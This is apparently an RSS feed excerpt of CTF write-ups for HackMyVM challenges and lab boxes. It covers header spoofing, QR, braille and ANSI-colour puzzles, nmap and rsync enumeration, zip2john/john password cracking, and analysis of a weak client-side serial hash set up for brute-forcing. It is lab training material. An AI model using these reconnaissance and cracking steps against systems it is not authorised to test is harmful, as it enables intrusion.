**Find a 6-character password starting with 'P8' whose remaining 4 digits, together with the 8, sum to 24 and multiply to 2048.**</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20021.html</guid><pubDate>Thu, 12 Jun 2025 10:56:34 +0000</pubDate></item><item><title>Challenge 020</title><link>https://7r1UMPH.github.io/post/Challenge%20020.html</link><description>![image-20250612183946052](https://7r1umph.top/image/202506121839359.webp)

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl http://momo.hackmyvm.eu/li0nsg3l9vhhe/                        
You are not coming from https://nepcodex.com/                                         
```

Spoof the `Referer` request header

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -e https://nepcodex.com/ http://momo.hackmyvm.eu/li0nsg3l9vhhe/
HMV{youareawelcome}                                                                  
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20020.html</guid><pubDate>Thu, 12 Jun 2025 10:41:24 +0000</pubDate></item><item><title>Challenge 019</title><link>https://7r1UMPH.github.io/post/Challenge%20019.html</link><description>![image-20250612183423004](https://7r1umph.top/image/202506121834338.webp)

Download

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ ll 019.zip        
-rwxr-xr-x 1 kali kali 276 Jun 12 06:34 019.zip
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ 7z x 019.zip                 

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 276 bytes (1 KiB)

Extracting archive: 019.zip
--
Path = 019.zip
Type = zip
Physical Size = 276

Everything is Ok

Size:       588
Compressed: 276
          
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 019.txt   
▄▄▄▄▄▄▄ ▄▄  ▄ ▄▄▄▄▄▄▄.█ ▄▄▄ █ ▄▀▄ █ █ ▄▄▄ █.█ ███ █ █▄▄█  █ ███ █.█▄▄▄▄▄█ ▄ ▄ ▄ █▄▄▄▄▄█.▄▄▄▄  ▄ ▄▀█▄▄▄  ▄▄▄ ▄.▀▄▀ ▄ ▄ ▄█▄▀ ▄██▀▀ ▄▄. █▄██▄▄███▀▄▄ ▄█ █▄▀▄.▄▄▄▄▄▄▄ ▀▄█▄▀  ▄█ ▄ ▀.█ ▄▄▄ █  ▄▄ ▀▀  ▀▀█▄▀.█ ███ █ █▀▄███ ▀ ▄▀▀ .█▄▄▄▄▄█ █▀ ▀▀▀█▀▄ ▄ ▀                                                                                                                                                          
```

Looks like a QR code.

Look for the pattern: every row ends with a dot, so split on it.

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cat 019.txt | tr '.' '\n' 
▄▄▄▄▄▄▄ ▄▄  ▄ ▄▄▄▄▄▄▄
█ ▄▄▄ █ ▄▀▄ █ █ ▄▄▄ █
█ ███ █ █▄▄█  █ ███ █
█▄▄▄▄▄█ ▄ ▄ ▄ █▄▄▄▄▄█
▄▄▄▄  ▄ ▄▀█▄▄▄  ▄▄▄ ▄
▀▄▀ ▄ ▄ ▄█▄▀ ▄██▀▀ ▄▄
 █▄██▄▄███▀▄▄ ▄█ █▄▀▄
▄▄▄▄▄▄▄ ▀▄█▄▀  ▄█ ▄ ▀
█ ▄▄▄ █  ▄▄ ▀▀  ▀▀█▄▀
█ ███ █ █▀▄███ ▀ ▄▀▀ 
█▄▄▄▄▄█ █▀ ▀▀▀█▀▄ ▄ ▀                                                                                                                                                                                    
```

Decode it with Caoliao (cli.im): https://cli.im/deqr/other

![image-20250612183849873](https://7r1umph.top/image/202506121838056.webp)

```
HMV{asciiartt}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20019.html</guid><pubDate>Thu, 12 Jun 2025 10:39:29 +0000</pubDate></item><item><title>Challenge 018</title><link>https://7r1UMPH.github.io/post/Challenge%20018.html</link><description>![image-20250612182911676](https://7r1umph.top/image/202506121829958.webp)

```
http://momo.hackmyvm.eu/ZiP004JfyGh/
```

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl http://momo.hackmyvm.eu/ZiP004JfyGh/
&lt;!doctype html&gt;
&lt;html lang='en'&gt;
&lt;title&gt;018&lt;/title&gt;
Maybe the flag is in aaAxghuyrtlksd.php
&lt;/html&gt;
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php
Yes, I have the flag! :)      

┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -i http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 12 Jun 2025 10:30:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

Yes, I have the flag! :)                                                                
```

POST request

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ curl -X POST http://momo.hackmyvm.eu/ZiP004JfyGh/aaAxghuyrtlksd.php   
HMV{postpostpost}                                                                     
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20018.html</guid><pubDate>Thu, 12 Jun 2025 10:34:09 +0000</pubDate></item><item><title>Challenge 017</title><link>https://7r1UMPH.github.io/post/Challenge%20017.html</link><description>![image-20250612182714769](https://7r1umph.top/image/202506121827070.webp)

```
⠓⠍⠧{⠊⠙⠕⠝⠞⠅⠝⠕⠺⠃⠗⠁⠊⠇⠇⠑}
```

Braille

https://zh.wikipedia.org/wiki/%E7%9B%B2%E6%96%87

Convert it by hand against the table.

```
HMV{idontknowbraille}
```

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20017.html</guid><pubDate>Thu, 12 Jun 2025 10:28:47 +0000</pubDate></item><item><title>Challenge 016</title><link>https://7r1UMPH.github.io/post/Challenge%20016.html</link><description>![image-20250612182407919](https://7r1umph.top/image/202506121824441.webp)

```
HMV{\033[31mw\033[31mh\033[31my\033[31m i\033[31mm \033[31mn\033[31mo\033[31mt \033[39m m\033[39ma\033[39my\033[39mb\033[39me \033[39mu\033[39ms\033[39me \033[32m g\033[32mr\033[32me\033[32me\033[32mn\033[32mt\033[32mh\033[32me\033[32mf\033[32ml\033[32ma\033[32mg\033[39m}
```

Terminal colour codes used to disguise the flag

```
why im not maybe use green the flag
```

Green

```
HMV{greentheflag}
```
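An added Python example (not the page's own code) that separates the layers: it parses the SGR colour escapes, buckets characters by the foreground colour in force when they are printed, and returns the green layer; the flag text constant is copied from the page, with the escapes in the literal backslash-033 form shown there.

```python
"""Separate text hidden behind ANSI colour codes (added example, not the page's own code).

Each flag letter sits behind an SGR escape, so the terminal shows a decoy in
red and default colour while the real flag is green. Grouping characters by the
foreground colour active when they are printed pulls the layers apart.
"""
import re

# ESC [ params m  (SGR sequence); params are ';'-separated decimal codes.
SGR = re.compile(r'\x1b\[([0-9;]*)m')

# Flag text as printed on the page, escapes in literal backslash-033 form.
FLAG_TEXT = (r'HMV{\033[31mw\033[31mh\033[31my\033[31m i\033[31mm \033[31mn\033[31mo'
             r'\033[31mt \033[39m m\033[39ma\033[39my\033[39mb\033[39me \033[39mu'
             r'\033[39ms\033[39me \033[32m g\033[32mr\033[32me\033[32me\033[32mn'
             r'\033[32mt\033[32mh\033[32me\033[32mf\033[32ml\033[32ma\033[32mg\033[39m}')


def to_escape_bytes(text):
    """Turn the printable forms backslash-033, backslash-x1b and backslash-e into a real ESC."""
    for literal in ('\\033', '\\x1b', '\\e'):
        text = text.replace(literal, '\x1b')
    return text


def colour_layers(text):
    """Map each SGR foreground code to the characters printed while it was active.

    Tracks 30-37, 90-97 (bright), 39 (default) and 0 (reset, back to default);
    other parameters such as bold or background colours do not change the layer.
    """
    text = to_escape_bytes(text)
    layers = {}
    fg = 39          # default foreground until the first escape
    pos = 0
    for match in SGR.finditer(text):
        layers[fg] = layers.get(fg, '') + text[pos:match.start()]
        for param in (match.group(1) or '0').split(';'):
            code = int(param or '0')
            if code == 0:
                fg = 39
            elif code in range(30, 38) or code == 39 or code in range(90, 98):
                fg = code
        pos = match.end()
    layers[fg] = layers.get(fg, '') + text[pos:]
    return layers


def visible_text(text):
    """What a reader sees once colour is ignored: the decoy sentence."""
    return SGR.sub('', to_escape_bytes(text))


def hidden_flag(text, colour=32):
    """Characters printed in one colour (green by default), whitespace dropped."""
    return ''.join(colour_layers(text).get(colour, '').split())


if __name__ == '__main__':
    print(visible_text(FLAG_TEXT))
    print('green layer:', hidden_flag(FLAG_TEXT))
```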

。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/Challenge%20016.html</guid><pubDate>Thu, 12 Jun 2025 10:26:52 +0000</pubDate></item><item><title>hmv_Sabulaji</title><link>https://7r1UMPH.github.io/post/hmv_Sabulaji.html</link><description>Ugh, this box left me speechless.

First, find the IP

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ sudo arp-scan -l            
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:08       VMware, Inc.
192.168.205.2   00:50:56:f8:ba:aa       VMware, Inc.
192.168.205.136 08:00:27:05:77:df       PCS Systemtechnik GmbH
192.168.205.254 00:50:56:f3:0c:de       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.966 seconds (130.21 hosts/sec). 4 responded
          
```

Service scan

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nmap -p- 192.168.205.136
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:39 EDT
Nmap scan report for 192.168.205.136
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
873/tcp open  rsync
MAC Address: 08:00:27:05:77:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
                                                                            
```

https://book.hacktricks.wiki/zh/network-services-pentesting/873-pentesting-rsync.html#873---pentesting-rsync
Read it if you're interested; roughly, what it does is:

![image-20250612085331462](https://7r1umph.top/image/20250612085338904.webp)

List the shared modules

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ rsync rsync://192.168.205.136:873

public          Public Files
epages          Secret Documents
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ rsync rsync://192.168.205.136:873/public/

drwxr-xr-x          4,096 2025/05/15 12:35:39 .
-rw-r--r--            433 2025/05/15 12:35:39 todo.list
                                                                       
```

Pull it down

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ mkdir tmp
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ rsync -avz rsync://192.168.205.136:873/public/ ./tmp/public/

receiving incremental file list
created directory ./tmp/public
./
todo.list

sent 46 bytes  received 380 bytes  852.00 bytes/sec
total size is 433  speedup is 1.02
                                                            
┌──(kali㉿kali)-[/mnt/hgfs/gx/tmp/public]
└─$ cat todo.list | trans -b :zh 2&gt;/dev/null
待办事项列表
==========

1。</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Sabulaji.html</guid><pubDate>Thu, 12 Jun 2025 02:00:59 +0000</pubDate></item><item><title>内部_bughash</title><link>https://7r1UMPH.github.io/post/nei-bu-_bughash.html</link><description>Keep it up!

![image-20250608114424427](https://7r1umph.top/image/20250608114424653.webp)

Find the target IP

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ sudo arp-scan -l
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.205.1   00:50:56:c0:00:08       VMware, Inc.
192.168.205.2   00:50:56:f4:ef:6f       VMware, Inc.
192.168.205.131 08:00:27:1f:68:e6       PCS Systemtechnik GmbH
192.168.205.254 00:50:56:ed:18:9e       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.180 seconds (117.43 hosts/sec). 4 responded
                                                          
```

Service scan

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ nmap -p22,8080 -sC -sV 192.168.205.131
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 23:44 EDT
Nmap scan report for 192.168.205.131
Host is up (0.00079s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0 (protocol 2.0)
8080/tcp open  http    Node.js Express framework
|_http-title: \xE5\xA4\xA7\xE5\x82\xBB\xE5\xAD\x90\xE5\xBA\x8F\xE5\x88\x97\xE5\x8F\xB7\xE9\xAA\x8C\xE8\xAF\x81\xE7\xB3\xBB\xE7\xBB\x9F
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_zip2john 2026bak.zip &gt; ziphash
MAC Address: 08:00:27:1F:68:E6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds
                                                                                 
```

Port 8080 exposes a 2026bak.zip file; pull it down

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ wget http://192.168.205.131:8080/2026bak.zip
--2025-06-07 23:46:14--  http://192.168.205.131:8080/2026bak.zip
Connecting to 192.168.205.131:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 676250 (660K) [application/zip]
Saving to: ‘2026bak.zip’

2026bak.zip                                  100%[=============================================================================================&gt;] 660.40K  --.-KB/s    in 0.03s   

2025-06-07 23:46:14 (24.1 MB/s) - ‘2026bak.zip’ saved [676250/676250]

                            
```

Try opening it

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ 7z x 2026bak.zip                      

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 676250 bytes (661 KiB)

Extracting archive: 2026bak.zip
--
Path = 2026bak.zip
Type = zip
Physical Size = 676250

    
Enter password (will not be echoed):
```

It wants a password; crack it with john

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ zip2john 2026bak.zip &gt; hash
ver 2.0 2026bak.zip/2026bak/ is not encrypted, or stored with non-handled compression type
ver 2.0 2026bak.zip/2026bak/app.js PKZIP Encr: TS_chk, cmplen=550, decmplen=1189, crc=398AEF6F ts=58E6 cs=58e6 type=8
ver 2.0 2026bak.zip/2026bak/package.json PKZIP Encr: TS_chk, cmplen=188, decmplen=269, crc=B3FD1F4B ts=51B7 cs=51b7 type=8
ver 2.0 2026bak.zip/2026bak/pnpm-lock.yaml PKZIP Encr: TS_chk, cmplen=6576, decmplen=16896, crc=8A30424C ts=95C7 cs=95c7 type=8
ver 2.0 2026bak.zip/2026bak/public/ is not encrypted, or stored with non-handled compression type
ver 2.0 2026bak.zip/2026bak/public/css/ is not encrypted, or stored with non-handled compression type
ver 2.0 2026bak.zip/2026bak/public/css/all.min.css PKZIP Encr: TS_chk, cmplen=22371, decmplen=102025, crc=3F9C99C5 ts=908D cs=908d type=8
ver 2.0 2026bak.zip/2026bak/public/index.html PKZIP Encr: TS_chk, cmplen=2337, decmplen=8708, crc=BA472F2A ts=6A60 cs=6a60 type=8
ver 2.0 2026bak.zip/2026bak/public/js/ is not encrypted, or stored with non-handled compression type
ver 2.0 2026bak.zip/2026bak/public/js/index.js PKZIP Encr: TS_chk, cmplen=2140, decmplen=7773, crc=51B509C2 ts=50FC cs=50fc type=8
ver 2.0 2026bak.zip/2026bak/public/js/md5.min.js PKZIP Encr: TS_chk, cmplen=1587, decmplen=3770, crc=ABC5E899 ts=A254 cs=a254 type=8
ver 2.0 2026bak.zip/2026bak/public/js/seedrandom.min.js PKZIP Encr: TS_chk, cmplen=924, decmplen=1631, crc=A32D162A ts=9BE5 cs=9be5 type=8
ver 2.0 2026bak.zip/2026bak/public/robots.txt PKZIP Encr: TS_chk, cmplen=117, decmplen=122, crc=707883A9 ts=4D0C cs=4d0c type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/ is not encrypted, or stored with non-handled compression type
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-brands-400.ttf PKZIP Encr: TS_chk, cmplen=122902, decmplen=210792, crc=B603F717 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-brands-400.woff2 PKZIP Encr: TS_chk, cmplen=118720, decmplen=118680, crc=E0935466 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-regular-400.ttf PKZIP Encr: TS_chk, cmplen=26762, decmplen=68064, crc=8BAA11E2 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-regular-400.woff2 PKZIP Encr: TS_chk, cmplen=25494, decmplen=25472, crc=D76269F6 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-solid-900.ttf PKZIP Encr: TS_chk, cmplen=173643, decmplen=426112, crc=43F15403 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-solid-900.woff2 PKZIP Encr: TS_chk, cmplen=158282, decmplen=158220, crc=2F37E44A ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-v4compatibility.ttf PKZIP Encr: TS_chk, cmplen=5048, decmplen=10836, crc=56DA8271 ts=2BFC cs=2bfc type=8
ver 2.0 2026bak.zip/2026bak/public/webfonts/fa-v4compatibility.woff2 PKZIP Encr: TS_chk, cmplen=4813, decmplen=4796, crc=D4BF5069 ts=2BFC cs=2bfc type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
                                                                                                                                                                                   
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ john --show hash                                     
2026bak.zip:123456789::2026bak.zip:2026bak/public/robots.txt, 2026bak/package.json, 2026bak/app.js, 2026bak/public/js/seedrandom.min.js, 2026bak/public/js/md5.min.js, 2026bak/public/js/index.js, 2026bak/public/index.html, 2026bak/public/webfonts/fa-v4compatibility.woff2:2026bak.zip

1 password hash cracked, 0 left
               
```

The password is 123456789; extract

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ 7z x 2026bak.zip -p123456789          

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 676250 bytes (661 KiB)

Extracting archive: 2026bak.zip
--
Path = 2026bak.zip
Type = zip
Physical Size = 676250

    
Would you like to replace the existing file:
  Path:     ./2026bak/app.js
  Size:     0 bytes
  Modified: 2025-06-05 23:07:10
with the file from archive:
  Path:     2026bak/app.js
  Size:     1189 bytes (2 KiB)
  Modified: 2025-06-05 23:07:10
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A

Everything is Ok       

Folders: 5
Files: 17
Size:       1165355
Compressed: 676250
                                           
```

Look at the directory layout

```
┌──(kali㉿kali)-[/mnt/hgfs/gx]
└─$ cd 2026bak                   
                
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ tree .    
.
├── app.js
├── package.json
├── pnpm-lock.yaml
└── public
    ├── css
    │   └── all.min.css
    ├── index.html
    ├── js
    │   ├── index.js
    │   ├── md5.min.js
    │   └── seedrandom.min.js
    ├── robots.txt
    └── webfonts
        ├── fa-brands-400.ttf
        ├── fa-brands-400.woff2
        ├── fa-regular-400.ttf
        ├── fa-regular-400.woff2
        ├── fa-solid-900.ttf
        ├── fa-solid-900.woff2
        ├── fa-v4compatibility.ttf
        └── fa-v4compatibility.woff2

5 directories, 17 files
                 
```

app.js first

```
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ cat app.js                                
const express = require('express');
const path = require('path');

const app = express();
const port = process.env.PORT || 8080;

// parse JSON request bodies
app.use(express.json());

// serve static files
app.use(express.static('public'));

// /checkSN route (POST)
app.post('/checkSN', (req, res) =&gt; {
    // read the SN parameter from the request body
    const sn = req.body.sn;

    if (sn) {
        if (sn === 'xxxxxxxxxxxxxxxxxxxxxxxxx') {
            res.json({
                code: 200,
                data: 'xxxxxx:XXXXX',
                msg: 'Success: Valid SN '
            });
        } else {
            res.json({
                code: 401,
                data: null,
                msg: 'Error: Invalid SN'
            });
        }
    } else {
        res.status(400).json({
            code: 400,
            data: null,
            msg: 'Missing sn parameter in request body'
        });
    }
});
app.use((req, res) =&gt; {
    res.status(404).json({
        code: 404,
        data: null,
        msg: '404 Not Found'
    });
});

app.listen(port, () =&gt; {
    console.log(`Server running at http://localhost:${port}`);
});                                                                                                                                                                                   
```

The client transforms the serial number somehow and POSTs the result to /checkSN.

Next, public/js/index.js

```
┌──(kali㉿kali)-[/mnt/hgfs/gx/2026bak]
└─$ cat public/js/index.js 
document.addEventListener('DOMContentLoaded', function () {
    const snInput = document.getElementById('sn-input');
    const verifyBtn = document.getElementById('verify-btn');
    const responseText = document.getElementById('response-text');
    const statusIcon = document.getElementById('status-icon');
    function cleanInput(value) {
        return value.replace(/[^a-zA-Z0-9]/g, '').toUpperCase();
    }
    function formatSerialNumber(value) {
        let cleanValue = cleanInput(value);
        let formatted = '';
        for (let i = 0; i &lt; cleanValue.length; i++) {
            if (i &gt; 0 &amp;&amp; i % 5 === 0) {
                formatted += '-';
            }
            formatted += cleanValue[i];
        }
        return formatted;
    }
    snInput.addEventListener('input', function () {
        const startPos = snInput.selectionStart;
        const formattedValue = formatSerialNumber(snInput.value);
        snInput.value = formattedValue;
        let newPos = startPos;
        if (startPos === 6 || startPos === 12 || startPos === 18 || startPos === 24) {
            newPos = startPos + 1;
        }
        snInput.setSelectionRange(newPos, newPos);
    });
    snInput.addEventListener('keypress', function (e) {
        if (e.key === 'Enter') {
            verifySerialNumber();
        }
    });

    verifyBtn.addEventListener('click', verifySerialNumber);
    function verifySerialNumber() {
        const serialNumber = cleanInput(snInput.value);
        statusIcon.className = 'status-icon pending';
        statusIcon.innerHTML = '&lt;i class="fas fa-circle-notch fa-spin"&gt;&lt;/i&gt;';
        responseText.textContent = '验证中，请稍候...';
        if (serialNumber.length !== 25) {
            statusIcon.className = 'status-icon error';
            statusIcon.innerHTML = '&lt;i class="fas fa-exclamation-triangle"&gt;&lt;/i&gt;';
            responseText.textContent = '错误: 序列号长度不正确 (需要25个字符)';
            return;
        }
        let hashSN = CreatehashSN(snInput.value);
        // console.log('hashSN:', hashSN);

        setTimeout(function () {
            fetch('/checkSN', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ sn: hashSN })
            })
                .then(response =&gt; response.json())
                .then(data =&gt; {
                    console.log('checkSN response:', data);
                    if (data.code === 200) {
                        statusIcon.className = 'status-icon success';
                        statusIcon.innerHTML = '&lt;i class="fas fa-check-circle"&gt;&lt;/i&gt;';
                        responseText.innerHTML = `序列号 &lt;strong&gt;${snInput.value}&lt;/strong&gt; &lt;br&gt;验证成功！&lt;br&gt; ${data.data}`;
                    }
                    else {
                        statusIcon.className = 'status-icon error';
                        statusIcon.innerHTML = '&lt;i class="fas fa-times-circle"&gt;&lt;/i&gt;';
                        responseText.innerHTML = `序列号 &lt;strong&gt;${snInput.value}&lt;/strong&gt; 验证失败！&lt;br&gt;状态: 无效或已被使用`;
                    }
                });
        }, 300);
    }
});

// Random number generator function (uses Math.seedrandom)
function R(seed, min = 100, max = 200) {
    // const rng = new Math.seedrandom(seed);
    // // return Math.floor(rng() * (max - min + 1)) + min;
    // return Math.floor((max - min + 1)) + min;
    return seed + min + max;
}
function CreatehashSN(SN) {
    // if(SN.length!== 29)
    // {
    //     return '序列号长度不正确 (需要25个字符)';
    // }
    console.log('SN', SN);
    const VI = 'Jkdsfojweflk0024564555*';
    const KEY = '6K+35LiN6KaB5bCd6K+V5pq05Yqb56C06Kej77yM5LuU57uG55yL55yL5Yqg5a+G5rqQ5Luj56CB44CC';

    let a = [];
    let b = [];
    let e = [];
    let f = [];
    let z = [];

    // Process the SN string
    for (let i = 0; i &lt; SN.length; i++) {
        const charCode = SN.charCodeAt(i);

        if (i &gt;= 0 &amp;&amp; i &lt;= 4) {
            a.push(R(charCode));
            b.push(R(charCode));
            e.push(R(charCode));
            f.push(R(charCode));
            z.push(R(charCode));
        }
        if (i &gt;= 5 &amp;&amp; i &lt;= 9) {
            b.push(R(charCode));
            e.push(R(charCode));
            f.push(R(charCode));
            z.push(R(charCode));
        }
        if (i &gt;= 10 &amp;&amp; i &lt;= 14) {
            e.push(R(charCode));
            f.push(R(charCode));
            z.push(R(charCode));
        }
        if (i &gt;= 15 &amp;&amp; i &lt;= 19) {
            f.push(R(charCode));
            z.push(R(charCode));
        }
        if (i &gt;= 20 &amp;&amp; i &lt;= 24) {
            z.push(R(charCode));
        }
    }
    // console.log('a', a);
    // console.log('b', b);
    // console.log('e', e);
    // console.log('f', f);
    // console.log('z', z);
    // e = Math.max(f, g);
    if (a[0] &gt; a[2] || a[1] &gt; a[3]) {
        a[0] = Math.max(a[0], a[1], a[2], a[3], a[4]);
    } else {
        a[0] = Math.min(a[0], a[1], a[2], a[3], a[4]);
    }
    if (b[4] &gt; b[6]) {
        b[0] = Math.max(b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7]);
    } else {
        b[0] = Math.min(b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7]);
    }
    if (e[8] &gt; e[10] || e[9] &gt; e[11]) {
        e[0] = Math.max(e[0], e[1], e[2], e[3], e[4], e[5], e[6], e[7], e[8], e[9], e[10], e[11]);
    } else {
        e[0] = Math.min(e[0], e[1], e[2], e[3], e[4], e[5], e[6], e[7], e[8], e[9], e[10], e[11]);
    }
    if (f[0] &gt; f[10]) {
        f[0] = Math.max(f[0], f[1], f[2], f[3], f[4], f[5], f[6], f[7], f[8], f[9], f[10], f[11], f[12], f[13], f[14], f[15], f[16], f[17], f[18], f[19]);
    } else {
        f[0] = Math.min(f[0], f[1], f[2], f[3], f[4], f[5], f[6], f[7], f[8], f[9], f[10], f[11], f[12], f[13], f[14], f[15], f[16], f[17], f[18], f[19]);
    }
    if (z[15] &gt; z[17] || z[18] &gt; z[24]) {
        z[0] = Math.max(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10], z[11], z[12], z[13], z[14], z[15], z[16], z[17], z[18], z[19], z[20], z[21], z[22], z[23], z[24]);
    } else {
        z[0] = Math.min(z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8], z[9], z[10], z[11], z[12], z[13], z[14], z[15], z[16], z[17], z[18], z[19], z[20], z[21], z[22], z[23], z[24]);
    }
    // console.log('a[0]', a[0]);
    // console.log('b[0]', b[0]);
    // console.log('e[0]', e[0]);
    // console.log('f[0]', f[0]);
    // console.log('z[0]', z[0]);
    let sum = 0;
    for (let i = 0; i &lt; a.length; i++) {
        sum += a[i]
    }
    // console.log('sum', sum);
    a[0] = (sum ^ a[0]) % 12;
    a[0] = KEY.charAt(a[0]);

    for (let i = 0; i &lt; b.length; i++) {
        sum += b[i]
    }
    // console.log('sum', sum);
    b[0] = (sum ^ b[0]) % 9;
    b[0] = KEY.charAt(b[0]);

    for (let i = 0; i &lt; e.length; i++) {
        sum += e[i]
    }
    // console.log('sum', sum);

    e[0] = (sum ^ e[0]) % 8;
    e[0] = KEY.charAt(e[0]);


    for (let i = 0; i &lt; f.length; i++) {
        sum += f[i]
    }
    // console.log('sum', sum);
    f[0] = (sum ^ f[0]) % 7;
    f[0] = KEY.charAt(f[0]);

    for (let i = 0; i &lt; z.length; i++) {
        sum += z[i]
    }
    // console.log('sum', sum);
    z[0] = (sum ^ z[0]) % 6;
    z[0] = VI.charAt(z[0]);

    // console.log('a[0]', a[0]);
    // console.log('b[0]', b[0]);
    // console.log('e[0]', e[0]);
    // console.log('f[0]', f[0]);
    // console.log('z[0]', z[0]);
    let hashSN = md5(a[0] + b[0] + e[0] + f[0] + z[0]);
    // console.log('hashSN', hashSN);
    return hashSN;
}
                                                               
```

This hashSN is flawed: it is a fixed quantity, so it can simply be brute-forced.

Capture a request from the web page.

![image-20250608115935547](https://7r1umph.top/image/20250608115936018.webp)

Type anything and capture the packet:

```
POST /checkSN HTTP/1.1
Host: 192.168.205.131:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.205.131:8080/
Content-Type: application/json
Content-Length: 41
Origin: http://192.168.205.131:8080
Connection: keep-alive
Priority: u=4

{"sn":"4818799e57fe67c963b90a99f797beae"}
```

Then just hand it to an AI; I don't want to write it myself.

The AI's version had a couple of small problems: it didn't print each attempt (fine), but it also seemed to keep brute-forcing after a success, so I fixed it myself.

```
